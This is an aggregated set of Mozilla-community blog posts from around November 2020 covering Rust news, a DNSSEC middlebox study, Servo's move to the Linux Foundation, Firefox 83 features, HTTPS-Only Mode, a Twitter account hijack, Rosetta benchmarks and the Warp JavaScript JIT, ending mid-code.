Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

This time we have two quotes of the week:

i just spent 8h finding a mutability bug and now i wanna be a catgirl

@castle_vanity on twitter reacting to a post depicting C++ programmers as muscle-laden bodybuilders and Rust programmers as catgirls

Thanks to Maximilian Goisser for the suggestion.

The code people write is first a question to the compiler, and later a story for people changing that code.

Esteban Kuber on /r/rust

llogiq is mightily pleased with his suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Security BlogMeasuring Middlebox Interference with DNS Records

Overview

The Domain Name System (DNS) is often referred to as the “phonebook of the Internet.” It is responsible for translating human readable domain names–such as mozilla.org–into IP addresses, which are necessary for nearly all communication on the Internet. At a high level, clients typically resolve a name by sending a query to a recursive resolver, which is responsible for answering queries on behalf of a client. The recursive resolver answers the query by traversing the DNS hierarchy, starting from a root server, a top-level domain server (e.g. for .com), and finally the authoritative server for the domain name. Once the recursive resolver receives the answer for the query, it caches the answer and sends it back to the client.

Unfortunately, DNS was not originally designed with security in mind, leaving users vulnerable to attacks. For example, previous work has shown that recursive resolvers are susceptible to cache poisoning attacks, in which on-path attackers impersonate authoritative nameservers and send incorrect answers for queries to recursive resolvers. These incorrect answers then get cached at the recursive resolver, which may cause clients that later query the same domain names to visit malicious websites. This attack is successful because the DNS protocol typically does not provide any notion of correctness for DNS responses. When a recursive resolver receives an answer for a query, it assumes that the answer is correct.

DNSSEC is able to prevent such attacks by enabling domain name owners to provide cryptographic signatures for their DNS records. It also establishes a chain of trust between servers in the DNS hierarchy, enabling clients to validate that they received the correct answer.

Unfortunately, DNSSEC deployment has been comparatively slow: measurements show, as of November 2020, only about 1.8% of .com records are signed, and about 25% of clients worldwide use DNSSEC-validating recursive resolvers. Even worse, essentially no clients validate DNSSEC themselves, which means that they have to trust their recursive resolvers.

One potential obstacle to client-side validation is network middleboxes. Measurements have shown that some middleboxes do not properly pass all DNS records. If a middlebox were to block the RRSIG records that carry DNSSEC signatures, clients would not be able to distinguish this from an attack, making DNSSEC deployment problematic. Unfortunately, these measurements were taken long ago and were not specifically targeted at DNSSEC. To get to the bottom of things, we decided to run an experiment.

Measurement Description

There are two main questions we want to answer:

  • At what rate do network middleboxes between clients and recursive resolvers interfere with DNSSEC records (e.g., DNSKEY and RRSIG)?
  • How does the rate of DNSSEC interference compare to interference with other relatively new record types (e.g., SMIMEA and HTTPSSVC)?

At a high level, in collaboration with Cloudflare we will first serve the above record types from domain names that we control. We will then deploy an add-on experiment to Firefox Beta desktop clients which requests each record type for our domain names. Finally, we will check whether we got the expected responses (or any response at all). As always, users who have opted out of sending telemetry or participating in studies will not receive the add-on.
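
The add-on itself issues these requests through Firefox's internal resolver, but the shape of the check is easy to illustrate. Here is a rough sketch using the third-party dnspython library and a placeholder domain; the record-type names and error handling are simplified assumptions, not the experiment's actual code:

import dns.resolver  # third-party: pip install dnspython

# Record types of interest; "HTTPS" is the current name for what earlier
# drafts called HTTPSSVC, and recent dnspython releases understand it.
RECORD_TYPES = ["DNSKEY", "RRSIG", "SMIMEA", "HTTPS"]

def check_records(domain):
    """Query each record type and note whether a usable answer came back."""
    results = {}
    for rtype in RECORD_TYPES:
        try:
            answer = dns.resolver.resolve(domain, rtype)
            results[rtype] = [rdata.to_text() for rdata in answer]
        except Exception as exc:  # NXDOMAIN, NoAnswer, timeouts, ...
            results[rtype] = "no usable response ({})".format(type(exc).__name__)
    return results

print(check_records("example.com"))  # placeholder domain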

To analyze the rate of network middlebox interference with DNSSEC records, we will send DNS responses to our telemetry system, rather than performing any analysis locally within the client’s browser. This will enable us to see the different ways that DNS responses are interfered with without relying on whatever analysis logic we bake into our experiment’s add-on. In order to protect user privacy, we will only send information for the domain names in the experiment that we control—not for any other domain names for which a client issues requests when browsing the web. Furthermore, we are not collecting UDP, TCP, or IP headers. We are only collecting the payload of the DNS response, for which we know the expected format. The data we are interested in should not include identifying information about a client, unless middleboxes inject such information when they interfere with DNS requests/responses.

We are launching the experiment today to 1% of Firefox Beta desktop clients and expect to publish our initial results around the end of the year.

The post Measuring Middlebox Interference with DNS Records appeared first on Mozilla Security Blog.

Hacks.Mozilla.OrgFoundations for the Future

Introduction

This week the Servo project took a significant next step in bringing community-led transformative innovations to the web by announcing it will be hosted by the Linux Foundation.  Mozilla is pleased to see Servo, which began as a research effort in 2012, open new doors that can lead it to ever broader benefits for users and the web. Working together, the Servo project and Linux Foundation are a natural fit for nurturing continued growth of the Servo community, encouraging investment in development, and expanding availability and adoption.

Historical Retrospective

From the outset the Servo project was about pioneering new approaches to web browsing fundamentals leveraging the extraordinary advantages of the Rust programming language, itself a companion Mozilla research effort. Rethinking the architecture and implementation of core browser operations allowed Servo to demonstrate extraordinary benefits from parallelism and direct leverage of our increasingly sophisticated computer and mobile phone hardware.

Those successes inspired the thinking behind Project Quantum, which in 2017 delivered compelling improvements in user responsiveness and performance for Firefox in large part by incorporating Servo’s parallelized styling engine (“Stylo”) along with other Rust-based components. More recently, Servo’s WebRender GPU-based rendering subsystem delivered new performance enhancements for Firefox, and Servo branched out to become an equally important component of Mozilla’s Firefox Reality virtual reality browser.

What’s Next?

All along the way, the Servo project has been an exemplary showcase for the benefits of open source based community contribution and leadership. Many other individuals and organizations contributed much of the implementation work that has found its way into Servo, Firefox, Firefox Reality, and indirectly the Rust programming language itself.

Mozilla is excited at what the future holds for Servo. Organizing and managing an effort at the scale and reach of Servo is no small thing, and the Linux Foundation is an ideal home with all the operational expertise and practical capabilities to help the project fully realize its potential. The term “graduate” somehow feels appropriate for this transition, and Mozilla could not be prouder or more enthusiastic.

For more information about the Servo project and to contribute, please visit servo.org.

 

The post Foundations for the Future appeared first on Mozilla Hacks - the Web developer blog.

About:CommunityWelcoming New Contributors: Firefox 83

With the release of Firefox 83, we are pleased to welcome all the developers who’ve contributed their first code change to Firefox in this release, 18 of whom are brand new volunteers! Please join us in thanking each of these diligent and enthusiastic individuals, and take a look at their contributions:

Hacks.Mozilla.OrgFirefox 83 is upon us

Did November spawn a monster this year? In truth, November has given us a few snippets of good news, far from the least of which is the launch of Firefox 83! In this release we’ve got a few nice additions, including Conical CSS gradients, overflow debugging in the Developer Tools, enabling of WebRender across more platforms, and more besides.

This blog post provides merely a set of highlights; for all the details, check out the following:

DevTools

In the HTML Pane, scrollable elements have a “scroll” badge next to them, which you can now toggle to highlight elements causing an overflow (expanding nodes as needed to make them visible):

devtools page inspector showing a scroll badge next to an element that is scrolling

You will also see an “overflow” badge next to the node causing the overflow.

Firefox devtools screenshot showing an overflow badge next to a child element that is causing its parent to overflow

And in addition to that, if you hover over the node(s) causing the overflow, the UI will show a “ghost” of the content so you can see how far it overflows.

Firefox UI showing a highlighted paragraph and a ghost of the hidden overflow content

These new features are very useful for helping to debug problems related to overflow.

Web platform additions

Now let’s see what’s been added to Gecko in Firefox 83.

Conic gradients

We’ve had support for linear gradients and radial gradients in CSS images (e.g. in background-image) for a long time. Now in Firefox 83 we can finally add support for conic gradients to that list!

You can create a really simple conic gradient using two colors:

conic-gradient(red, orange);

simple conic gradient that goes from red to orange

But there are many options available. A more complex syntax example could look like so:

conic-gradient(
  from 45deg /* vary starting angle */
  at 30% 40%, /* vary position of gradient center */
  red, /* include multiple color stops */
  orange,
  yellow,
  green,
  blue,
  indigo 80%, /* vary angle of individual color stops */
  violet 90%
)

complex conic gradient showing all the colors of the rainbow, positioned off center

And in the same manner as the other gradient types, you can create repeating conic gradients:

repeating-conic-gradient(#ccc 20deg, #666 40deg)

repeating conic gradient that continually goes from dark gray to light gray

For more information and examples, check out our conic-gradient() reference page, and the Using CSS gradients guide.

WebRender comes to more platforms

We started work on our WebRender rendering architecture a number of years ago, with the aim of delivering the whole web at 60fps. This has already been enabled for Windows 10 users with suitable hardware, but today we bring the WebRender experience to Win7, Win8 and macOS 10.12 to 10.15 (not 10.16 beta as yet).

It’s an exciting time for Firefox performance — try it now, and let us know what you think!

Pinch to zoom on desktop

Last but not least, we’d like to draw your attention to pinch to zoom on desktop — this has long been requested, and finally we are in a position to enable pinch to zoom support for:

  • Windows laptop touchscreens
  • Windows laptop touchpads
  • macOS laptop touchpads

The post Firefox 83 is upon us appeared first on Mozilla Hacks - the Web developer blog.

Botond BalloDesktop pinch-zoom support arrives with Firefox 83

Today is the release date of Firefox 83. One of the new features in this release is support for pinch-zooming on desktop platforms, a feature whose development I was involved with and which I’ll describe briefly in this blog post.

Pinch gestures have long been the standard method of interaction to trigger zooming on mobile devices, and the mobile version of Firefox has supported them since (I believe) its inception.

The desktop version of Firefox has also had a zoom feature for a long time, activated via Ctrl+Plus/Minus or Ctrl+mousewheel or a button in the UI, but importantly, this performs a different type of zooming than pinch gestures on mobile, as I’ll illustrate.

The conventional method of zooming on desktop performs reflowing zoom, which looks like this:

By contrast, pinch gestures on mobile perform non-reflowing zoom, which looks like this:

While both methods of zooming increase the scale of text, images, and other content elements, reflowing zoom reflows the page such that the scaled-up content still fits into the same horizontal viewport width. This can cause text to be split up into lines differently, and more generally elements to change their position relative to each other. Non-reflowing zoom leaves the page layout alone and just scales the content, creating overflow in the horizontal direction that you need to scroll to bring into view.

Non-reflowing zoom has some important advantages over reflowing zoom:

  • Reflow is expensive, making non-reflowing zoom much faster and more responsive.
  • Non-reflowing zoom is more predictable in the sense that the content at the pinch gesture’s “focus point” will remain stationary, so you can zoom in “on an element” more accurately.

The non-reflowing behaviour can also be a downside: if it’s a paragraph of text you’re zooming in on and you zoom to a point where the lines are wider than the screen, you have to scroll horizontally to read each line.

Basically, reflowing and non-reflowing zoom lend themselves to different use cases. Reflowing zoom is useful if, say, you’re reading an article but the text is a bit small for comfort (though I’ll take the opportunity to plug Firefox’s Reader View as an even better option for this case). Non-reflowing zoom is useful if, say, you want to zoom in on an image or diagram to get a closer look at it.

Firefox users have long asked for the ability to trigger non-reflowing zoom on desktop platforms, using pinch gestures on a touchscreen or touchpad, a feature that other browsers have introduced over time as well. Firefox 83 finally fulfils this request, for touchscreens on all platforms, and touchpads on Windows and Mac. (Linux touchpads are still a work in progress.)

Reflowing zoom hasn’t gone away, it’s still activated using the same means as before (Ctrl+mousewheel etc.).

I’d like to extend a big thank you to my colleagues Kartikaya Gupta, Timothy Nikkel, and Kris Taeleman, with whom I collaborated on this feature, among many others who lent a helping hand.

Implementing this feature was trickier than it sounds. Without getting into too many details, some of the main sources of complexity were:

  • Scrollbars, particularly given that on desktop platforms you can interact with them (i.e. click them / drag them). I think our implementation here ended up being more complete than Chrome’s, in that scrollbars remain fully interactive even when zoomed.
  • Web pages that want to handle pinch gestures themselves and “do their own thing”, such as Google Maps. Careful coordination is required to determine whether the pinch gesture should be handled by the page, or by the browser.

If you’re a Firefox user with a touchscreen or a touchpad, I encourage you to give the new zoom feature a try! If you’re not a Firefox user, I encourage you to try Firefox 🙂 If you run into any issues, bug reports are appreciated.

Mozilla Future Releases BlogEnding Firefox support for Flash

On January 26, 2021, Firefox will end support for Adobe Flash, as announced back in 2017. Adobe and other browsers will also end support for Flash in January and we are working together to ensure a smooth transition for all.

Firefox version 84 will be the final version to support Flash. On January 26, 2021 when we release Firefox version 85, it will ship without Flash support, improving our performance and security. For our users on Nightly and Beta release channels, Flash support will end on November 17, 2020 and December 14, 2020 respectively. There will be no setting to re-enable Flash support.

The Adobe Flash plugin will stop loading Flash content after January 12, 2021. See Adobe’s Flash Player End of Life information page for more details.

The post Ending Firefox support for Flash appeared first on Future Releases.

Mozilla Security BlogFirefox 83 introduces HTTPS-Only Mode

 

Security on the web matters. Whenever you connect to a web page and enter a password, a credit card number, or other sensitive information, you want to be sure that this information is kept secure. Whether you are writing a personal email or reading a page on a medical condition, you don’t want that information leaked to eavesdroppers on the network who have no business prying into your personal communications.

That’s why Mozilla is pleased to introduce HTTPS-Only Mode, a brand-new security feature available in Firefox 83. When you enable HTTPS-Only Mode:

  • Firefox attempts to establish fully secure connections to every website, and
  • Firefox asks for your permission before connecting to a website that doesn’t support secure connections.

 

How HTTPS-Only Mode works

The Hypertext Transfer Protocol (HTTP) is a fundamental protocol through which web browsers and websites communicate. However, data transferred by the regular HTTP protocol is unprotected and transferred in cleartext, such that attackers are able to view, steal, or even tamper with the transmitted data. HTTP over TLS (HTTPS) fixes this security shortcoming by creating a secure and encrypted connection between your browser and the website you’re visiting. You know a website is using HTTPS when you see the lock icon in the address bar:

The majority of websites already support HTTPS, and those that don’t are increasingly uncommon. Regrettably, websites often fall back to using the insecure and outdated HTTP protocol. Additionally, the web contains millions of legacy HTTP links that point to insecure versions of websites. When you click on such a link, browsers traditionally connect to the website using the insecure HTTP protocol.

In light of the very high availability of HTTPS, we believe that it is time to let our users choose to always use HTTPS. That’s why we have created HTTPS-Only Mode, which ensures that Firefox doesn’t make any insecure connections without your permission. When you enable HTTPS-Only Mode, Firefox tries to establish a fully secure connection to the website you are visiting.

Whether you click on an HTTP link, or you manually enter an HTTP address, Firefox will use HTTPS instead. Here’s what that upgrade looks like:

 

How to turn on HTTPS-Only Mode

If you are eager to try this new security enhancing feature, enabling HTTPS-Only Mode is simple:

  1. Click on Firefox’s menu button and choose “Preferences”.
  2. Select “Privacy & Security” and scroll down to the section “HTTPS-Only Mode”.
  3. Choose “Enable HTTPS-Only Mode in all windows”.

Once HTTPS-Only Mode is turned on, you can browse the web as you always do, with confidence that Firefox will upgrade web connections to be secure whenever possible, and keep you safe by default. For the small number of websites that don’t yet support HTTPS, Firefox will display an error message that explains the security risk and asks you whether or not you want to connect to the website using HTTP. Here’s what the error message looks like:

It also can happen, rarely, that a website itself is available over HTTPS but resources within the website, such as images or videos, are not available over HTTPS. Consequently, some web pages may not look right or might malfunction. In that case, you can temporarily disable HTTPS-Only Mode for that site by clicking the lock icon in the address bar:

The HTTPS-Only Mode options are "On", "Off", and "Off temporarily"

The future of the web is HTTPS-Only

Once HTTPS becomes even more widely supported by websites than it is today, we expect it will be possible for web browsers to deprecate HTTP connections and require HTTPS for all websites. In summary, HTTPS-Only Mode is the future of web browsing!

Thank You

We are grateful to many Mozillians for making HTTPS-Only Mode possible, including but not limited to the work of Meridel Walkington, Eric Pang, Martin Thomson, Steven Englehardt, Alice Fleischmann, Angela Lazar, Mikal Lewis, Wennie Leung, Frederik Braun, Tom Ritter, June Wilde, Sebastian Streich, Daniel Veditz, Prangya Basu, Dragana Damjanovic, Valentin Gosu, Chris Lonnen, Andrew Overholt, and Selena Deckelmann. We also want to acknowledge the work of our friends at the EFF, who pioneered a similar approach in HTTPS Everywhere’s EASE Mode. It’s a privilege to work with people who are passionate about building the web we want: free, independent and secure.

 

The post Firefox 83 introduces HTTPS-Only Mode appeared first on Mozilla Security Blog.

The Servo BlogServo’s new home

The Servo Project is excited to announce that it has found a new home with the Linux Foundation. Servo was incubated inside Mozilla, and served as the proof that important web components such as CSS and rendering could be implemented in Rust, with all its safety, concurrency and speed. Now it’s time for Servo to leave the nest!

This move comes with a change in project governance: the Servo Project gains a board and a technical steering committee to help guide the project’s future (see github.com/servo/project/ for more details).

Servo’s high-level goals remain unchanged: to provide a high-performance, safe rendering engine for embedding in other applications. It is the responsibility of the technical steering committee to provide direction for these goals and enable the wider Servo community to make meaningful contributions that advance this mission.

As a result of these changes, it is now easier than ever before to contribute to Servo’s future. Whether by writing code or documentation, testing nightlies and filing issues, or donating to help cover the project’s new CI and hosting costs, every bit helps. If you know a company that would like to support the Servo Project, please get in touch as we will be rolling out a formal membership program to support the future of the project.

We also have a new home for discussions, help and general conversation, at the Servo Zulip. We hope to see you there, and look forward to building the future of embeddable web rendering engines with you in our new home!

Daniel StenbergI lost my twitter account

tldr: it’s back now!

At 00:42 in the early morning of November 16 (my time, Central European Time), I received an email saying that “someone” logged into my twitter account @bagder from a new device. The email said it was done from Stockholm, Sweden and it was “Chrome on Windows”. (I live in Stockholm)

I didn’t do it. I don’t normally use Windows and I typically don’t run Chrome. I didn’t react immediately to the email however, as I was debugging curl code at the moment it arrived. Just a few moments later I was forcibly logged out from my twitter sessions (using tweetdeck in my Firefox on Linux and on my phone).

Whoa! What was that? I tried to login again in the browser tab, but Twitter claimed my password was invalid. Huh? Did I perhaps have the wrong password? I selected “restore my password” and then learned that Twitter doesn’t even know about my email anymore (in spite of having emailed me on it just minutes ago).

At 00:50 I reported the issue to Twitter. At 00:51 I replied to their confirmation email and provided them with additional information, such as my phone number I have (had?) associated with my account.

I’ve since followed up with two additional emails to Twitter with further details about this but I have yet to hear something from them. I cannot access my account.

November 17 (30 hours after it happened): the name of my account was changed to Elon Musk (with a few funny unicode letters that only look similar to the Latin letters) and the account pushed bitcoin scams.

Also mentioned on hacker news and reddit.

At 20:56 on November 17 I received the email with the notice the account had been restored back to my email address and ownership.

Left now are the very sad DM responses in my account from desperate and ruined people who cry out for help and mercy from the scammers after they’ve fallen for the scam and lost large sums of money.

How?

A lot of people ask me how this was done. The simple answer is that I don’t know. At. All. Maybe I will later on but right now, it all went down as described above and it does not tell how the attacker managed to perform this. Maybe I messed up somewhere? I don’t know and I refuse to speculate without having more information.

I’m convinced I had 2fa enabled on the account, but I’m starting to doubt if perhaps I am mistaking myself?

Why me?

Probably because I have a “verified” account (with a blue check-mark) with almost 24.000 followers.

Other accounts

I have not found any attacks, take-overs or breaches in any other online accounts and I have no traces of anyone attacking my local computer or other accounts of mine with value. I don’t see any reason to be alarmed to suspect that source code or github project I’m involved with should be “in danger”.

Credits

Image by Jill Wellington from Pixabay

Cameron KaiserRosetta 2: This Time It's Personal (and busting an old Rosetta myth)

Apple's back in the RISC camp, though I still hate the name Apple Silicon, as if Apple has some special sauce for certain inorganic elements that makes it any better than any other kind of silicon. With the release of the M1 ("merely" an A14 on steroids by all accounts) a series of benchmarks have been turning up on Geekbench, which because I'm such a big conspiracy theorist I suspect are probably being astroturfed out of Infinite Loop itself. One that particularly attracted my attention, however, is this one which shows Rosetta 2 (the x86_64-on-AARM emulator analogous to the Rosetta PPC-on-Intel emulator in 10.4-10.6) exceeding the single-core performance of Apple's other Intel machines on Intel apps. The revenge-of-the-G5 Mac Pro is conspicuously absent (for the record a cursory search on the 2019 model yields scores from around 1024 to 1116 depending on configuration), but M1 still eclipses it and even edges past the i9 in the current 27" iMac.

That's pretty stupendous, so I'd like to take a moment to once again destroy my least favourite zombie performance myth, that the original Rosetta was faster at running PowerPC apps than PowerPC Macs. This gets endlessly repeated as justification for the 2005 Intel transition and it's false.

We even have some surviving benchmarks from the time. Bare Feats did a series of comparisons of the Mac Pro 2.66, 3.0 and the Quad G5 running various Adobe pro applications, which at the time were only available as PowerPC and had to run in Rosetta. The Mac Pros were clearly faster at Universal binaries with native Intel code, but not only did the Quad G5 consistently beat the 2.66GHz Mac Pro on the tested PowerPC-only apps, it even got by the 3.0GHz at least once, and another particular shootout was even more lopsided. The situation was only marginally better for the laptop side, where, despite a 20% faster clock speed, the MacBook Pro Core Duo 2.0GHz only beat the last and fastest DLSD G4/1.67GHz in one benchmark (and couldn't beat a 2.0GHz G5 at all). Clock-for-clock, the Power Macs were still overall faster on their own apps than the first Intel Macs and it wasn't until native Intel code was available that the new generation became the obvious winner. There may have been many good reasons for Apple making the jump but this particular reason wasn't one of them.

And this mirrors the situation with early Power Macs during the 68K-PPC transition where the first iterations of the built-in 68K emulator were somewhat underwhelming, especially on the 603 which didn't have enough cache for the task until the 603e. The new Power Macs really kicked butt on native code but it took the combination of beefier chips and a better recompiling 68K emulator to comfortably exceed the '040s in 68K app performance.

If the Rosetta 2 benchmarks for the M1 are to be believed, this would be the first time Apple's new architecture indisputably exceeded its old one even on the old architecture's own turf. I don't know if that's enough to make me buy one given Apple's continued lockdown (cough) trajectory, but it's enough to at least make me watch the M1's progress closely.

Chris IliasClippings for Thunderbird replacement: Quicktext

I was a long-time user of Clippings in Thunderbird. I used it for canned responses in the support newsgroups and more. Now that Clippings is not being updated for Thunderbird 78, it’s time to look for a replacement.

I found a great replacement, called Quicktext.

With Quicktext, I create a TXT file for each response and put them in a designated directory. Quicktext has the option to paste from a TXT file or an HTML file. When composing a message, there are two buttons to the far-right above the text area.

To paste text from a local file, click Other, then choose either Insert file as Text or Insert file as HTML.

Additionally, you can click Variable and paste items like the sender or recipient’s name, attachment name and size, dates, and more.

I’ve found Quicktext to be more versatile than Clippings, and have been very happy with it. You can download it from addons.thunderbird.net.

Cameron KaiserTenFourFox FPR29 available

TenFourFox Feature Parity Release 29 final is now available for testing (downloads, hashes, release notes). There are no additional changes from the beta except for outstanding security patches. Locale langpacks will accompany this release and should be available simultaneously on or about Monday or Tuesday (November 17 or 18) parallel to mainline Firefox.

Because of the holidays and my work schedule, I’m evaluating what might land in the next release; it may simply be a routine security update, to give me some time to catch up on other things. This release would come out on or about December 15, and I would probably not have a beta unless the changes were significant. More as I make a determination.

Robert O'Callahanrr Repository Moved To Independent Organisation

For a long time, rr has not been a Mozilla project in practice, so we have worked with Mozilla to move it to an independent Github organization. The repository is now at https://github.com/rr-debugger/rr. Update your git remotes!

This gives us a bit more operational flexibility for the future because we don't need Mozilla to assist in making certain kinds of Github changes.

There have been no changes in intellectual property ownership. rr contributions made by Mozilla employees and contractors remain copyrighted by Mozilla. I will always be extremely grateful for the investment Mozilla made to create rr!

For now, the owners of the rr-debugger organisation will be me (Robert O'Callahan), Kyle Huey, and Keno Fischer (of Julia fame, who has been a prolific contributor to rr).

Mozilla Security BlogPreloading Intermediate CA Certificates into Firefox

Throughout 2020, Firefox users have been seeing fewer secure connection errors while browsing the Web. We’ve been working to reduce connection errors overall for some time, and a new feature called Intermediate Certificate Authority (CA) Preloading is our latest innovation. This technique reduces connection errors that users encounter when web servers forget to properly configure their TLS security.

In essence, Firefox pre-downloads all trusted Web Public Key Infrastructure (PKI) intermediate CA certificates into Firefox via Mozilla’s Remote Settings infrastructure. This way, Firefox users avoid seeing an error page for one of the most common server configuration problems: not specifying proper intermediate CA certificates.

For Intermediate CA Preloading to work, we need to be able to enumerate every intermediate CA certificate that is part of the trusted Web PKI. As a result of Mozilla’s leadership in the CA community, each CA in Mozilla’s Root Store Policy is required to disclose these intermediate CA certificates to the multi-browser Common CA Database (CCADB). Consequently, all of the relevant intermediate CA certificates are available via the CCADB reporting mechanisms. Given this information, we periodically synthesize a list of these intermediate CA certificates and place them into Remote Settings. Currently the list contains over two thousand entries.

When Firefox receives the list for the first time (or later receives updates to the list), it enumerates the entries in batches and downloads the corresponding intermediate CA certificates in the background. The list changes slowly, so once a copy of Firefox has completed the initial downloads, it’s easy to keep it up-to-date. The list can be examined directly using your favorite JSON tooling at this URL: https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/intermediates/records
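If you prefer to poke at the collection from a script rather than a browser, a minimal sketch like the following works against the public endpoint above. This is just an illustration (not anything Firefox does internally); it assumes a runtime with a built-in fetch such as Node 18+, and it only prints the field names of the first record rather than guessing at them:

// Minimal sketch: fetch the intermediates collection and inspect it.
// Remote Settings (Kinto) endpoints wrap the records in a "data" array.
const RECORDS_URL =
  "https://firefox.settings.services.mozilla.com/v1/buckets/security-state/collections/intermediates/records";

async function main(): Promise<void> {
  const response = await fetch(RECORDS_URL);
  const body = (await response.json()) as { data: Record<string, unknown>[] };

  console.log(`Intermediate CA records: ${body.data.length}`);
  if (body.data.length > 0) {
    // Print the field names of the first record to see what is available.
    console.log("Record fields:", Object.keys(body.data[0]).join(", "));
  }
}

main().catch(console.error);

This only reads the metadata records; the certificates themselves are fetched as attachments, which is what the Kinto Attachment plugin mentioned below handles.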

For details on processing the records, see the Kinto Attachment plugin for Kinto, used by Firefox Remote Settings.

Certificates provided via Intermediate CA Preloading are added to a local cache and are not imbued with trust. Trust is still derived from the standard Web PKI algorithms.

Our collected telemetry confirms that enabling Intermediate CA Preloading in Firefox 68 has led to a decrease of unknown issuers errors in the TLS Handshake.

unknown issuer errors declining after Firefox Beta 68

While there are other factors that affect the relative prevalence of this error, this data supports the conclusion that Intermediate CA Preloading is achieving the goal of avoiding these connection errors for Firefox users.

Intermediate CA Preloading is reducing errors today in Firefox for desktop users, and we’ll be working to roll it out to our mobile users in the future.

The post Preloading Intermediate CA Certificates into Firefox appeared first on Mozilla Security Blog.

Daniel Stenbergthere is always a CURLOPT for it

Embroidered and put on the kitchen wall, on a mug or just as words of wisdom to bring with you in life?

Hacks.Mozilla.OrgWarp: Improved JS performance in Firefox 83

Introduction

We have enabled Warp, a significant update to SpiderMonkey, by default in Firefox 83. SpiderMonkey is the JavaScript engine used in the Firefox web browser.

With Warp (also called WarpBuilder) we’re making big changes to our JIT (just-in-time) compilers, resulting in improved responsiveness, faster page loads and better memory usage. The new architecture is also more maintainable and unlocks additional SpiderMonkey improvements.

This post explains how Warp works and how it made SpiderMonkey faster.

How Warp works

Multiple JITs

The first step when running JavaScript is to parse the source code into bytecode, a lower-level representation. Bytecode can be executed immediately using an interpreter or can be compiled to native code by a just-in-time (JIT) compiler. Modern JavaScript engines have multiple tiered execution engines.

JS functions may switch between tiers depending on the expected benefit of switching:

  • Interpreters and baseline JITs have fast compilation times, perform only basic code optimizations (typically based on Inline Caches), and collect profiling data.
  • The Optimizing JIT performs advanced compiler optimizations but has slower compilation times and uses more memory, so is only used for functions that are warm (called many times).

The optimizing JIT makes assumptions based on the profiling data collected by the other tiers. If these assumptions turn out to be wrong, the optimized code is discarded. When this happens the function resumes execution in the baseline tiers and has to warm-up again (this is called a bailout).

For SpiderMonkey it looks like this (simplified):

Baseline Interpreter/JIT, after warmup Ion/Warp JIT. Bailout arrow from Ion/Warp back to Baseline.

Profiling data

Our previous optimizing JIT, Ion, used two very different systems for gathering profiling information to guide JIT optimizations. The first is Type Inference (TI), which collects global information about the types of objects used in the JS code. The second is CacheIR, a simple linear bytecode format used by the Baseline Interpreter and the Baseline JIT as the fundamental optimization primitive. Ion mostly relied on TI, but occasionally used CacheIR information when TI data was unavailable.

With Warp, we’ve changed our optimizing JIT to rely solely on CacheIR data collected by the baseline tiers. Here’s what this looks like:
overview of profiling data as described in the text

There’s a lot of information here, but the thing to note is that we’ve replaced the IonBuilder frontend (outlined in red) with the simpler WarpBuilder frontend (outlined in green). IonBuilder and WarpBuilder both produce Ion MIR, an intermediate representation used by the optimizing JIT backend.

Where IonBuilder used TI data gathered from the whole engine to generate MIR, WarpBuilder generates MIR using the same CacheIR that the Baseline Interpreter and Baseline JIT use to generate Inline Caches (ICs). As we’ll see below, the tighter integration between Warp and the lower tiers has several advantages.

How CacheIR works

Consider the following JS function:

function f(o) {
    return o.x - 1;
}

The Baseline Interpreter and Baseline JIT use two Inline Caches for this function: one for the property access (o.x), and one for the subtraction. That’s because we can’t optimize this function without knowing the types of o and o.x.

The IC for the property access, o.x, will be invoked with the value of o. It can then attach an IC stub (a small piece of machine code) to optimize this operation. In SpiderMonkey this works by first generating CacheIR (a simple linear bytecode format, you could think of it as an optimization recipe). For example, if o is an object and x is a simple data property, we generate this:

GuardToObject        inputId 0
GuardShape           objId 0, shapeOffset 0
LoadFixedSlotResult  objId 0, offsetOffset 8
ReturnFromIC

Here we first guard the input (o) is an object, then we guard on the object’s shape (which determines the object’s properties and layout), and then we load the value of o.x from the object’s slots.

Note that the shape and the property’s index in the slots array are stored in a separate data section, not baked into the CacheIR or IC code itself. The CacheIR refers to the offsets of these fields with shapeOffset and offsetOffset. This allows many different IC stubs to share the same generated code, reducing compilation overhead.

The IC then compiles this CacheIR snippet to machine code. Now, the Baseline Interpreter and Baseline JIT can execute this operation quickly without calling into C++ code.

The subtraction IC works the same way. If o.x is an int32 value, the subtraction IC will be invoked with two int32 values and the IC will generate the following CacheIR to optimize that case:

GuardToInt32     inputId 0
GuardToInt32     inputId 1
Int32SubResult   lhsId 0, rhsId 1
ReturnFromIC

This means we first guard the left-hand side is an int32 value, then we guard the right-hand side is an int32 value, and we can then perform the int32 subtraction and return the result from the IC stub to the function.

The CacheIR instructions capture everything we need to do to optimize an operation. We have a few hundred CacheIR instructions, defined in a YAML file. These are the building blocks for our JIT optimization pipeline.

Warp: Transpiling CacheIR to MIR

If a JS function gets called many times, we want to compile it with the optimizing compiler. With Warp there are three steps:

  1. WarpOracle: runs on the main thread, creates a snapshot that includes the Baseline CacheIR data.
  2. WarpBuilder: runs off-thread, builds MIR from the snapshot.
  3. Optimizing JIT Backend: also runs off-thread, optimizes the MIR and generates machine code.

The WarpOracle phase runs on the main thread and is very fast. The actual MIR building can be done on a background thread. This is an improvement over IonBuilder, where we had to do MIR building on the main thread because it relied on a lot of global data structures for Type Inference.

WarpBuilder has a transpiler to transpile CacheIR to MIR. This is a very mechanical process: for each CacheIR instruction, it just generates the corresponding MIR instruction(s).
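To make that concrete, here is an illustrative sketch in TypeScript-flavored pseudocode, not SpiderMonkey’s actual C++ transpiler; the operand bookkeeping is simplified and the emitted MIR node names are stand-ins:

// Illustrative pseudocode only: the point is that each CacheIR instruction
// maps directly onto one (or a few) MIR instructions.
type CacheIROp =
  | { kind: "GuardToObject"; inputId: number }
  | { kind: "GuardShape"; objId: number; shapeOffset: number }
  | { kind: "LoadFixedSlotResult"; objId: number; offsetOffset: number };

function transpileToMIR(ops: CacheIROp[], emit: (mirNode: string) => void): void {
  for (const op of ops) {
    switch (op.kind) {
      case "GuardToObject":
        emit(`GuardToObject(value ${op.inputId})`);
        break;
      case "GuardShape":
        emit(`GuardShape(obj ${op.objId}, shape @${op.shapeOffset})`);
        break;
      case "LoadFixedSlotResult":
        emit(`LoadFixedSlot(obj ${op.objId}, slot @${op.offsetOffset})`);
        break;
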